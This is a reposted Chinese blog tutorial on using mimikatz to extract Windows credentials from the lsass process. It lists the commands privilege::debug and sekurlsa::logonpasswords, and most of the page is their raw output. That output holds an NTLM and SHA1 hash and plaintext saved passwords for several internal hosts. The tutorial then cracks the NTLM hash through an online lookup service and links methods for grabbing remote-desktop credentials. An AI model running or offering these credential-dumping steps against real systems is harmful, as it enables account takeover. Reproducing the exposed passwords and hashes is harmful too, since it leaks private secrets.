admin 管理员组文章数量: 887006
mimikatz
一.mimikatz简介 是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://blog.gentilkiwi/
1,mimikatz凭据密码破解
参考网址
https://www.nigesb/introduction-of-mimikatz.html
https://blog.csdn/kevinstoic/article/details/9004784
*想要知道windows凭据的密码,则么办呢?
安装软件 mimikatz_trunk
开始:必须以管理员身份运行
.#####. mimikatz 2.1.1 (x64) built on Jun 16 201818:49:05 - lil!
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi )
## \ / ## > http://blog.gentilkiwi/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail )
'#####' > http://pingcastle /http://mysmartlogon ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 236664527 (00000000:0e1b36cf)
Session :Interactive from 6
User Name :xu wei dong
Domain :DESKTOP-NNIBHTL
Logon Server :DESKTOP-NNIBHTL
Logon Time :2018/6/26 15:35:58
SID :S-1-5-21-3375334107-2599323197-3143766014-1001
msv :
[00000003]Primary
* Username :xu wei dong
*Domain : DESKTOP-NNIBHTL
* NTLM : c488e5021502c7dfd4fa8560306644bd
* SHA1 : dd3e3a871fe28080b69218d556250f5170d68184
tspkg :
wdigest :
* Username :xu wei dong
*Domain : DESKTOP-NNIBHTL
* Password :(null)
kerberos :
* Username :xu wei dong
*Domain : DESKTOP-NNIBHTL
* Password :(null)
ssp :
credman :
[00000000]
* Username :xwd
*Domain : 192.168.37.129
* Password :123456
[00000001]
* Username :yushanggroup\rongziscan
*Domain : 10.12.0.1
* Password :111qqq.
[00000002]
* Username :zlfkshare
*Domain : 10.254.8.20
* Password :hywin123
2,破解windows开机密码
http://cmd5/
密文:如下
* NTLM c488e5021502c7dfd4fa8560306644bd
翻译出来是 80134140
3,破解远程终端凭据,获取服务器密码
https://www.sohu/a/197604840_99907709
在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:
https://www.nigesb/introduction-of-mimikatz.html
版权声明:本文标题:11--使用 mimikatz 提取 windows凭据的密码 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1733399337h1585802.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论